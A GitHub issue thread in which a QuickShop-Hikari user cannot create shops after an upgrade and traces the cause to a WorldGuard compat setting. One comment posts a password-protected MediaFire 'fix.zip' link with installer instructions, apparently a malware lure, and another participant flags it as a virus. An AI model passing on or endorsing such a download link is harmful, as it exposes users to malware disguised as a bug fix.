### ISSUE TITLE
[BUG] Can't create shops anymore?

### ISSUE THREAD

**Issue by TBedu** [Ghost-chu/QuickShop-Hikari#1742]
### Description

After I added the plugin Aurelium Skills, I was unable to create SHOPs in-game by left clicking, either as a regular player or an operator.   
I never had this problem before this.   
I also upgraded QuickShop from 6.2.0.5 to 6.2.0.7, and added   Addon-List-6.2.0.7,   Compat-WorldGuard-6.2.0.7,  
 Compat-Residence-6.2.0.7,   Compat-WorldEdit-6.2.0.7,   Addon-BlueMap-6.2.0.7   and kept the default configuration  

### Steps to reproduce

 I added the plugin Aurelium Skills, also upgraded QuickShop from 6.2.0.5 to 6.2.0.7, and added   Addon-List-6.2.0.7,   Compat-WorldGuard-6.2.0.7,  
 Compat-Residence-6.2.0.7,   Compat-WorldEdit-6.2.0.7,   Addon-BlueMap-6.2.0.7   and kept the default configuration  

### Expected Behaviour

Create shop normally

### `/quickshop paste` URL

https://paste.helpch.at/sihupikafo.makefile

### Checklist

- [X] I'm running Paper or Spigot, and not a fork
- [ ] I confirm that Paper/Spigot has been updated to the latest build
- [X] I confirm that QuickShop-Hikari has been updated to the latest stable version released on Modrinth (or the latest CI version)
- [ ] I confirm that I have not read these checkboxes and therefore I just ticked them all.
- [X] I confirm that I'm using QuickShop-Hikari, not QuickShop-Reremake, and I'm well aware that they're maintained by different people, and that Reremake issues shouldn't be reported here.
- [X] I confirm that I am running a server that is not a Hybird Server, (e.g. Mohist, Magma, CatServer, Banner, etc.), and I am aware that QuickShop-Hikari may not function properly on a Forge/Fabric hybrid server, and I am running at my own risk on such a server program, and I am aware that the I run such server-side programs at my own risk and know that I will not receive any support or help for this behavior.
- [X] I am well aware that if the Issue Ticket is not filled out correctly and completely, it will simply be closed without any response or reason.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YuanYuanOwO** [comment]
virus,don't download that.  
already delete the comment

**Comment by TBedu** [comment]
I have found the reason, it is caused by 'create.default-allow: false' in the 'config. yml' of 'Compat-WorldGuard-6.2.0.7'

**Comment by TBedu** [comment]
I have found the reason, it is caused by 'create. default allow: false' in the 'config. yml' of 'Compat-WorldGuard-6.2.0.7'
